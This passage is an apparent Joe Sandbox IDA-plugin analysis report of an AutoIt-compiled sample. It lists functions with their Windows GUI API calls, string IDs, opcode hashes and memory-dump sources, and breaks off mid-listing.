                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                          • String ID: 0
                                                          • API String ID: 1073566785-4108050209
                                                          • Opcode ID: b88c0c84fdf716b0b22b3aa679f91256bb7eb703bbab12be1809faf8fdc28ae4
                                                          • Instruction ID: 96a99351422477aab77415fd0f421b4befbf39f4f64859acb38b26d57e92568c
                                                          • Opcode Fuzzy Hash: b88c0c84fdf716b0b22b3aa679f91256bb7eb703bbab12be1809faf8fdc28ae4
                                                          • Instruction Fuzzy Hash: 05E19070910209AFDF219F94DC88EEE7BB8EF09710F108156F919AA291D7708EE1DF61
                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 002D5007
                                                          • GetDesktopWindow.USER32 ref: 002D501C
                                                          • GetWindowRect.USER32(00000000), ref: 002D5023
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 002D5085
                                                          • DestroyWindow.USER32(?), ref: 002D50B1
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002D50DA
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002D50F8
                                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 002D511E
                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 002D5133
                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 002D5146
                                                          • IsWindowVisible.USER32(?), ref: 002D5166
                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 002D5181
                                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 002D5195
                                                          • GetWindowRect.USER32(?,?), ref: 002D51AD
                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 002D51D3
                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 002D51ED
                                                          • CopyRect.USER32(?,?), ref: 002D5204
                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 002D526F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                          • String ID: ($0$tooltips_class32
                                                          • API String ID: 698492251-4156429822
                                                          • Opcode ID: 1058c222ea56b66abcf4411fdef996eb6329e0e64a38e71c8d9c18f5e998a528
                                                          • Instruction ID: 35060a1e61bfea7324b13ca2f517737076176bca8a9fc78eee3b880d3354fa0f
                                                          • Opcode Fuzzy Hash: 1058c222ea56b66abcf4411fdef996eb6329e0e64a38e71c8d9c18f5e998a528
                                                          • Instruction Fuzzy Hash: E3B1BC70624751AFD704DF64D888B6ABBE4BF88300F00891DF8999B291D7B0EC59CF95
                                                          APIs
                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 002B499C
                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 002B49C2
                                                          • _wcscpy.LIBCMT ref: 002B49F0
                                                          • _wcscmp.LIBCMT ref: 002B49FB
                                                          • _wcscat.LIBCMT ref: 002B4A11
                                                          • _wcsstr.LIBCMT ref: 002B4A1C
                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 002B4A38
                                                          • _wcscat.LIBCMT ref: 002B4A81
                                                          • _wcscat.LIBCMT ref: 002B4A88
                                                          • _wcsncpy.LIBCMT ref: 002B4AB3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                          • API String ID: 699586101-1459072770
                                                          • Opcode ID: fe6cafcbdb288dc44e1783cd37de8c6f9307de569e8efc5ec61b680f99d944e6
                                                          • Instruction ID: 5ef9e454826bfe05705977e1d1d87f730da3079b1a0e75977b5ab3c1dc56a490
                                                          • Opcode Fuzzy Hash: fe6cafcbdb288dc44e1783cd37de8c6f9307de569e8efc5ec61b680f99d944e6
                                                          • Instruction Fuzzy Hash: EE414B72A60205BBDB14BB749C87EFFB76CDF41350F004056F909A6183EB70DA319AA5
                                                          APIs
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00252C8C
                                                          • GetSystemMetrics.USER32(00000007), ref: 00252C94
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00252CBF
                                                          • GetSystemMetrics.USER32(00000008), ref: 00252CC7
                                                          • GetSystemMetrics.USER32(00000004), ref: 00252CEC
                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00252D09
                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00252D19
                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00252D4C
                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00252D60
                                                          • GetClientRect.USER32(00000000,000000FF), ref: 00252D7E
                                                          • GetStockObject.GDI32(00000011), ref: 00252D9A
                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00252DA5
                                                            • Part of subcall function 00252714: GetCursorPos.USER32(?), ref: 00252727
                                                            • Part of subcall function 00252714: ScreenToClient.USER32(003177B0,?), ref: 00252744
                                                            • Part of subcall function 00252714: GetAsyncKeyState.USER32(00000001), ref: 00252769
                                                            • Part of subcall function 00252714: GetAsyncKeyState.USER32(00000002), ref: 00252777
                                                          • SetTimer.USER32(00000000,00000000,00000028,002513C7), ref: 00252DCC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                          • String ID: AutoIt v3 GUI$h.
                                                          • API String ID: 1458621304-2189462632
                                                          • Opcode ID: c4186814d6f16d8560923d23d8f4e85edb6d5bd9edb97730a0d3fa381c9b9671
                                                          • Instruction ID: 8816356125713801f9c82492c686c95c34adb812c4f729ccb5c99cbfe1adbe0f
                                                          • Opcode Fuzzy Hash: c4186814d6f16d8560923d23d8f4e85edb6d5bd9edb97730a0d3fa381c9b9671
                                                          • Instruction Fuzzy Hash: FEB16C7565020ADFDB15DFA8DC89BAD7BB4FB08311F104129FA15A72D0CB70A8A5CF64
                                                          APIs
                                                            • Part of subcall function 00261821: _memmove.LIBCMT ref: 0026185B
                                                          • GetForegroundWindow.USER32(002E0980,?,?,?,?,?), ref: 002704E3
                                                          • IsWindow.USER32(?), ref: 002A66BB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$Foreground_memmove
                                                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                          • API String ID: 3828923867-1919597938
                                                          • Opcode ID: b6f0e971d14fc7ffdc78210c08d3ef81848376690d1f76fd0800c70fed0e3c7f
                                                          • Instruction ID: 015c227852a366803c474850405f5d9bd5bb8bcbf8d7c9296e1d971e8ff4642f
                                                          • Opcode Fuzzy Hash: b6f0e971d14fc7ffdc78210c08d3ef81848376690d1f76fd0800c70fed0e3c7f
                                                          • Instruction Fuzzy Hash: A8D1B130124702DBCB14EF20C8959AABBB5FF56344F188A19E459471A2CF70F9B9CF92
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 002D44AC
                                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002D456C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: BuffCharMessageSendUpper
                                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                          • API String ID: 3974292440-719923060
                                                          • Opcode ID: 170995f93821e0cdcfc3520c698831b7087d59e85b6da9dddb4f10a45d980c6b
                                                          • Instruction ID: c9e4df8598c1ae72cdfd23d99e79776ef3cfc458cb8bc1b1d2c75cede36d1fa8
                                                          • Opcode Fuzzy Hash: 170995f93821e0cdcfc3520c698831b7087d59e85b6da9dddb4f10a45d980c6b
                                                          • Instruction Fuzzy Hash: 36A170342343119FCB14FF20C891A6AB3A5EF89314F148969B8965B3D2DB70ED69CF51
                                                          APIs
                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 002C56E1
                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 002C56EC
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 002C56F7
                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 002C5702
                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 002C570D
                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 002C5718
                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 002C5723
                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 002C572E
                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 002C5739
                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 002C5744
                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 002C574F
                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 002C575A
                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 002C5765
                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 002C5770
                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 002C577B
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 002C5786
                                                          • GetCursorInfo.USER32(?), ref: 002C5796
                                                          • GetLastError.KERNEL32(00000001,00000000), ref: 002C57C1
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Cursor$Load$ErrorInfoLast
                                                          • String ID:
                                                          • API String ID: 3215588206-0
                                                          • Opcode ID: 16bbce98bccdc6775f2bda022a6e8aaefc4f33d80fc8c955d73fb5e4eccbd382
                                                          • Instruction ID: 33b52563226534661d1e472ea17bb8ea94578e42a0e55b0fb1947056e4c6357f
                                                          • Opcode Fuzzy Hash: 16bbce98bccdc6775f2bda022a6e8aaefc4f33d80fc8c955d73fb5e4eccbd382
                                                          • Instruction Fuzzy Hash: A9418670E043196ADF109FB68C49D6EFFF8EF41B10B10462FE509E7290DAB8A541CE91
                                                          APIs
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 002AB17B
                                                          • __swprintf.LIBCMT ref: 002AB21C
                                                          • _wcscmp.LIBCMT ref: 002AB22F
                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 002AB284
                                                          • _wcscmp.LIBCMT ref: 002AB2C0
                                                          • GetClassNameW.USER32(?,?,00000400), ref: 002AB2F7
                                                          • GetDlgCtrlID.USER32(?), ref: 002AB349
                                                          • GetWindowRect.USER32(?,?), ref: 002AB37F
                                                          • GetParent.USER32(?), ref: 002AB39D
                                                          • ScreenToClient.USER32(00000000), ref: 002AB3A4
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 002AB41E
                                                          • _wcscmp.LIBCMT ref: 002AB432
                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 002AB458
                                                          • _wcscmp.LIBCMT ref: 002AB46C
                                                            • Part of subcall function 0027385C: _iswctype.LIBCMT ref: 00273864
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                          • String ID: %s%u
                                                          • API String ID: 3744389584-679674701
                                                          • Opcode ID: c4bcd53056b5aa39924abcfabda83d5caa8d021726164734aca0f22329d386d0
                                                          • Instruction ID: b06725c09eac9f317b01abf222521f52e4ff6e05d385d5a78c2e7c13adcce898
                                                          • Opcode Fuzzy Hash: c4bcd53056b5aa39924abcfabda83d5caa8d021726164734aca0f22329d386d0
                                                          • Instruction Fuzzy Hash: 16A10171224707AFDB16DF20C894BAAB7E8FF4A314F008519F999C2192DB30E965CB91
                                                          APIs
                                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 002ABAB1
                                                          • _wcscmp.LIBCMT ref: 002ABAC2
                                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 002ABAEA
                                                          • CharUpperBuffW.USER32(?,00000000), ref: 002ABB07
                                                          • _wcscmp.LIBCMT ref: 002ABB25
                                                          • _wcsstr.LIBCMT ref: 002ABB36
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 002ABB6E
                                                          • _wcscmp.LIBCMT ref: 002ABB7E
                                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 002ABBA5
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 002ABBEE
                                                          • _wcscmp.LIBCMT ref: 002ABBFE
                                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 002ABC26
                                                          • GetWindowRect.USER32(00000004,?), ref: 002ABC8F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                          • String ID: @$ThumbnailClass
                                                          • API String ID: 1788623398-1539354611
                                                          • Opcode ID: beba213cef21e1e5e49383a99a317b4554a71968990404ac02ed534f7bf42f33
                                                          • Instruction ID: 0e8ff7ed0941ed6fe859a3a2bae1278bc303588c53f16d5ca4262871b1452713
                                                          • Opcode Fuzzy Hash: beba213cef21e1e5e49383a99a317b4554a71968990404ac02ed534f7bf42f33
                                                          • Instruction Fuzzy Hash: B681AD710242469FDB06CF10D885FAAB7E9EF45324F04856AFD898A096DF30EDA5CB61
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                          • API String ID: 1038674560-1810252412
                                                          • Opcode ID: 9d9757937834ad36ea982d8084bc228a32946993f6449c78b3dd9baba15577be
                                                          • Instruction ID: d8cc4ee064517acaac44f6d2a366984e886bc36231b7ca2586f3448f776dc28d
                                                          • Opcode Fuzzy Hash: 9d9757937834ad36ea982d8084bc228a32946993f6449c78b3dd9baba15577be
                                                          • Instruction Fuzzy Hash: 32310231A6170AA7DB06EAA0DC53EEE73B4AF12750F640125F540B10D2EF626E74CE42
                                                          APIs
                                                          • LoadIconW.USER32(00000063), ref: 002ACBAA
                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 002ACBBC
                                                          • SetWindowTextW.USER32(?,?), ref: 002ACBD3
                                                          • GetDlgItem.USER32(?,000003EA), ref: 002ACBE8
                                                          • SetWindowTextW.USER32(00000000,?), ref: 002ACBEE
                                                          • GetDlgItem.USER32(?,000003E9), ref: 002ACBFE
                                                          • SetWindowTextW.USER32(00000000,?), ref: 002ACC04
                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 002ACC25
                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 002ACC3F
                                                          • GetWindowRect.USER32(?,?), ref: 002ACC48
                                                          • SetWindowTextW.USER32(?,?), ref: 002ACCB3
                                                          • GetDesktopWindow.USER32 ref: 002ACCB9
                                                          • GetWindowRect.USER32(00000000), ref: 002ACCC0
                                                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 002ACD0C
                                                          • GetClientRect.USER32(?,?), ref: 002ACD19
                                                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 002ACD3E
                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 002ACD69
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                          • String ID:
                                                          • API String ID: 3869813825-0
                                                          • Opcode ID: d9f79c32aa14fa7b49ae5d6aa85c0e3545618aa12e428901418a4820af8ab859
                                                          • Instruction ID: fb4013179097cf44ead66e844d33ca69ef5ebfbec26038e78f80fd0de095972a
                                                          • Opcode Fuzzy Hash: d9f79c32aa14fa7b49ae5d6aa85c0e3545618aa12e428901418a4820af8ab859
                                                          • Instruction Fuzzy Hash: 56519F7090070AEFDB20DFA8DE89B6EBBF5FF04704F100929E546A65A0CB75A865CF50
                                                          APIs
                                                          • _memset.LIBCMT ref: 002DA87E
                                                          • DestroyWindow.USER32(00000000,?), ref: 002DA8F8
                                                            • Part of subcall function 00261821: _memmove.LIBCMT ref: 0026185B
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 002DA972
                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 002DA994
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002DA9A7
                                                          • DestroyWindow.USER32(00000000), ref: 002DA9C9
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00250000,00000000), ref: 002DAA00
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002DAA19
                                                          • GetDesktopWindow.USER32 ref: 002DAA32
                                                          • GetWindowRect.USER32(00000000), ref: 002DAA39
                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 002DAA51
                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 002DAA69
                                                            • Part of subcall function 002529AB: GetWindowLongW.USER32(?,000000EB), ref: 002529BC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                          • String ID: 0$tooltips_class32
                                                          • API String ID: 1297703922-3619404913
                                                          • Opcode ID: bbc1ed7cae0fcc3d89806db79f051eaf25e2e1fa338d34d1166fbd724ee77ac0
                                                          • Instruction ID: 251c239a5db19b594bb06dee6d52935440f4dec9e317960e3ccc5cab07a88f55
                                                          • Opcode Fuzzy Hash: bbc1ed7cae0fcc3d89806db79f051eaf25e2e1fa338d34d1166fbd724ee77ac0
                                                          • Instruction Fuzzy Hash: 2A71AB70160241AFD721CF28C899FA677F9FB88300F08461EF9858B3A0D771AD62CB52
                                                          APIs
                                                            • Part of subcall function 002529E2: GetWindowLongW.USER32(?,000000EB), ref: 002529F3
                                                          • DragQueryPoint.SHELL32(?,?), ref: 002DCCCF
                                                            • Part of subcall function 002DB1A9: ClientToScreen.USER32(?,?), ref: 002DB1D2
                                                            • Part of subcall function 002DB1A9: GetWindowRect.USER32(?,?), ref: 002DB248
                                                            • Part of subcall function 002DB1A9: PtInRect.USER32(?,?,002DC6BC), ref: 002DB258
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 002DCD38
                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002DCD43
                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002DCD66
                                                          • _wcscat.LIBCMT ref: 002DCD96
                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 002DCDAD
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 002DCDC6
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 002DCDDD
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 002DCDFF
                                                          • DragFinish.SHELL32(?), ref: 002DCE06
                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 002DCEF9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                          • API String ID: 169749273-3440237614
                                                          • Opcode ID: 34d081aaf5a6ad6436676a104c7c2d813717d4d8d74b10268c3490aea967702c
                                                          • Instruction ID: fd05e8b7c742e1db9d2302937f8cb187055ba4969195dd4a5af814fb30cc035a
                                                          • Opcode Fuzzy Hash: 34d081aaf5a6ad6436676a104c7c2d813717d4d8d74b10268c3490aea967702c
                                                          • Instruction Fuzzy Hash: 02617B71118341AFC701EF50DC89D9BBBF8EF88350F000A1EF595962A1DB709A59CF66
                                                          APIs
                                                          • VariantInit.OLEAUT32(00000000), ref: 002B831A
                                                          • VariantCopy.OLEAUT32(00000000,?), ref: 002B8323
                                                          • VariantClear.OLEAUT32(00000000), ref: 002B832F
